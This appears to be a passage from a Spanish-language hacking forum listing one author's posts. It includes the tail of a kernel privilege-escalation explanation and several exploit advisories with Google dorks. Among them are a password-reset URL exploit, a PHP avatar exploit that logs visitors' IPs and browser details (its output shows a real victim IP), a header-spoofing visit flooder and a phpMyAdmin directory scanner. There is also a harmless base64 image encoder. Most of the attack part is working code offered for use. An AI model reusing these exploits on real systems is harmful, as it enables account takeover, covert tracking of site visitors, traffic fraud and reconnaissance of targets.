direccion y almacenando alli lo que queremos que ejecute el kernel podemos sacar provecho
de dicha vulnerabilidad.
De este modo cuando dicho kernel intente ejecutar sendpage() en realidad ejecutara nuestro codigo
en el espacio de kernel, asi podremos escalar privilegios, haciendo que el codigo almacenado en la
direccion 0 ponga nuestro uid a 0 (uid=0 privilegios de root ^^)

Espero que se haya entendido y ahora se comprenda a fondo de como se aprovecha este maravilloso fallo.


#22
Código: php
# Exploit Title : PHP MatchMaker Remote User Reset Password Vulnerability
# Google Dork: allintext: Powered by PHP MatchMaker
# Date: 23/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.deltascripts.com/phpmatchmaker/
# Tested on: Linux

Dedicado a Duraznito y en especial a mi madre que es lo mas grande que hay :p

[POC]

If you know the email of any user can reset your password for an unlimited
visiting the following url
http://localhost/reset.php?email=[[email protected]]&submit=Continue
#23
# Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
# Software Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
# Tested on: Linux

[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.


[POC]
This vulnerability allow execute a php external file in any visitor of the forum.
The php file should have the malicious code.
The scope of the attack depends on the strength of the php file.
Código: php


<?php
// Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
$ip = $_SERVER['REMOTE_ADDR'];
$so= $_SERVER['HTTP_USER_AGENT'];
$lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$url= $_SERVER['PHP_SELF'];
$path= $_SERVER['DOCUMENT_ROOT'];
$archivo = 'pwned.txt';
$fp = fopen($archivo, "a");
$string = "
$path$url
VICTIM: $ip
info: $so
language: $lan
";
$write = fputs($fp, $string);
fclose($fp);
?>


[Content of pwned.txt]

/home146/sub011/sc78626-TZRV/xxxxxxxxx.org/poc.php

VICTIM: 207.182.149.243

info: Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0
#24
# Exploit Title: Small Pirate <= 2.3 Incorrect Flood Filter Headers
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
# Software Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
# Tested on: Linux

[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.

This vulnerability takes advantage of randomly generated headers and thus generating false origin falsifies visits

[PoC]
Código: php

<?php
//////config//////////////
$flood = 0;
$host = "domain.com";
$path = "/indexphp?referredby=[id]"; // change id!!
////////////////////////////////

////////FLOODER////////////////
while ( $flood < 1000) {
$rangoip1 = rand(1,254);
$rangoip2 = rand(1,254);
$rangoip3 = rand(1,254);
$rangoip4 = rand(1,254);
$ipgenerada = $rangoip1.".".$rangoip2.".".$rangoip3.".".$rangoip4;
$da = fsockopen($host, 80, $errno, $errstr, 30);
if (!$da) {
echo "$errstr ($errno)\n";
} else {
$salida = "GET http://".$host."$path HTTP/1.1\r\n";
$salida .= "Host: ".$host."\r\n";
$salida .= "X-Forwarded-For: $ipgenerada\r\n";
$salida .= "Via: CB-Prx\r\n";
$salida .= "Connection: Close\r\n\r\n";
fwrite($da, $salida);
fclose($da);
$flood++;
}
echo "Flooded a $host$path exitoso con la ip $ipgenerada<br>";
}
?>
#25
Back-end / Utilizar imagenes encodeadas en base64
Agosto 26, 2011, 04:44:25 AM
Bueno hoy para no subir  a ningun servidor de imagenes meti el contenido de una imagen en una variable codificada en base64.
Para eso les dejo una herramienta que codee hace ratito para hacer el trabajo mas facil.
Pegan la ruta o link de la imagen que quieren encondear y le dan en el boton img!

Código: php

<html>
<head>
<style>
body
{
background-color:#CCC;   
}
</style>
<title>Base64 img encoder.</title>
</head>
<body>
<?php
  $img=$_POST['img'];
if(isset($img)&&($img!= ""))
{
$contents = file_get_contents($img);
$base64 = base64_encode($contents);
$img_encoded= 'data:image/png;base64,'.$base64;
}
?>
<center>
     <form name="pr" action="" method="post">
     <table align="center">
     <td><input id="boton" type="text" name="img" size="50" maxlength="110" value=""></td>
     <td></td>
     <td><input id="boton" type="submit" name="submit" value="img!"></td>
     </table>
     <textarea cols="100" rows="30" name="texto">
     <?php echo $img_encoded; ?>
     </textarea>
</center>
</body>
</html>

una vez que obtiene el codigo que seria algo como esto:
Código: php
data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAv.......

Pueden guardar el contenido de  la textarea en una variable, y para utilzarla tienen que poner:

Código: php
 <img src="'.$imagen_encoded_b64.'">


Eso es todo, espero que sea de utilidad.
#26
Back-end / PMA Finder
Agosto 26, 2011, 04:36:43 AM
Herramienta que busca la ubicacion del phpmyadmin mediante un array que contiene los nombres de directorios mas comunes. Tambien se le pueden agregar mas.

Código: php

<html>
<title>0x3a PMA Finder</title>
<style type="text/css">
body{
    background: #000;
    color: #FFF;
    }
a:visited{
         color:#FFF;
         text-decoration: none;
         }
a:link{
         color:#FFF;
         text-decoration: none;
         }
a:hover{
         color:#FF0000;
         text-decoration: blink;
         }
input,option{
     font-family: verdana, sans-serif;
     font-size: 16pt;
     border: gray 2px solid;
     }           
#links{
       margin:0 auto;
       width:860px;
       border-color: #E8E8E8;
       text-align: right;
       }
</style>
<body>
<div id="links">
<center>
<img src="http://www.0x3a.com.ar/img/logo.png"/><br/>
<form action ="" method="post">
URL : <input type ="text" name="site"/>
<input type = "submit" value="PWN!" />
</form>

<?php
/**
*
*
* @author Daniel Godoy
* @copyright 2011
* @Site www.0x3a.com.ar www.remoteexecution.com.ar www.delincuentedital.com.ar
*
*  This program is free software: you can redistribute it and/or modify
*  it under the terms of the GNU General Public License as published by
*  the Free Software Foundation, either version 3 of the License, or
*  (at your option) any later version.
*
*  This program is distributed in the hope that it will be useful,
*  but WITHOUT ANY WARRANTY; without even the implied warranty of
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*  GNU General Public License for more details.
*
*  You should have received a copy of the GNU General Public License
*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
*
*
**/
$site = $_POST['site'];
$list = array('/phpMyAdmin/', '/phpmyadmin/','/PMA/','/pma/','/admin/','/dbadmin/','/mysql/', '/myadmin/', '/phpmyadmin2/','/phpMyAdmin2/', '/phpMyAdmin-2/',
              '/php-my-admin/','/phpMyAdmin-2.2.3/', '/phpMyAdmin-2.2.6/', '/phpMyAdmin-2.5.1/', '/phpMyAdmin-2.5.4/', '/phpMyAdmin-2.5.5-rc1/',
              '/phpMyAdmin-2.5.5-rc2/', '/phpMyAdmin-2.5.5/', '/phpMyAdmin-2.5.5-pl1/', '/phpMyAdmin-2.5.6-rc1/', '/phpMyAdmin-2.5.6-rc2/', '/phpMyAdmin-2.5.6/',
              '/phpMyAdmin-2.5.7/', '/phpMyAdmin-2.5.7-pl1/', '/phpMyAdmin-2.6.0-alpha/', '/phpMyAdmin-2.6.0-alpha2/', '/phpMyAdmin-2.6.0-beta1/',
              '/phpMyAdmin-2.6.0-beta2/', '/phpMyAdmin-2.6.0-rc1/', '/phpMyAdmin-2.6.0-rc2/', '/phpMyAdmin-2.6.0-rc3/','/phpMyAdmin-2.6.0/',
              '/phpMyAdmin-2.6.0-pl1/', '/phpMyAdmin-2.6.0-pl2/', '/phpMyAdmin-2.6.0-pl3/', '/phpMyAdmin-2.6.1-rc1/', '/phpMyAdmin-2.6.1-rc2/',
              '/phpMyAdmin-2.6.1/', '/phpMyAdmin-2.6.1-pl1/', '/phpMyAdmin-2.6.1-pl2/', '/phpMyAdmin-2.6.1-pl3/','/phpMyAdmin-2.6.2-rc1/',
              '/phpMyAdmin-2.6.2-beta1/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2/', '/phpMyAdmin-2.6.2-pl1/', '/phpMyAdmin-2.6.3/',
              '/phpMyAdmin-2.6.3-rc1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-pl1/', '/phpMyAdmin-2.6.4-rc1/', '/phpMyAdmin-2.6.4-pl1/',
              '/phpMyAdmin-2.6.4-pl2/', '/phpMyAdmin-2.6.4-pl3/', '/phpMyAdmin-2.6.4-pl4/', '/phpMyAdmin-2.6.4/', '/phpMyAdmin-2.7.0-beta1/',
              '/phpMyAdmin-2.7.0-rc1/', '/phpMyAdmin-2.7.0-pl1/', '/phpMyAdmin-2.7.0-pl2/', '/phpMyAdmin-2.7.0/', '/phpMyAdmin-2.8.0-beta1/',
              '/phpMyAdmin-2.8.0-rc1/', '/phpMyAdmin-2.8.0-rc2/', '/phpMyAdmin-2.8.0/', '/phpMyAdmin-2.8.0.1/', '/phpMyAdmin-2.8.0.2/', '/phpMyAdmin-2.8.0.3/',
              '/phpMyAdmin-2.8.0.4/', '/phpMyAdmin-2.8.1-rc1/', '/phpMyAdmin-2.8.1/', '/phpMyAdmin-2.8.2/', '/sqlmanager/', '/mysqlmanager/', '/p/m/a/',
              '/PMA2005/', '/pma2005/', '/phpmanager/', '/php-myadmin/', '/phpmy-admin/', '/webadmin/', '/sqlweb/', '/websql/', '/webdb/', '/mysqladmin/',
              '/mysql-admin/','/mya/',
             );

if(isset($site)){
                foreach($list as $path => $test) {
                                                 $ch = curl_init();
                                                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                 curl_setopt($ch, CURLOPT_HEADER, 1);
                                                 curl_setopt($ch, CURLOPT_URL, $site.$test);
                                                 $result = curl_exec($ch);
                                                 curl_close($ch);
if (preg_match("/200 OK/", $result)){
                                    flush();
                                    echo '<br/>[!] <a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
                                    ob_flush();
                                    }
                                   
                                    else if (preg_match("/401 Unauthorized/", $result)) {
                                                                                         flush();
                                                                                         echo '<br/> [!]<a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
                                                                                         ob_flush();
                                                                                        }
                }     
}

?>
</center>
</div>
</body>
</html>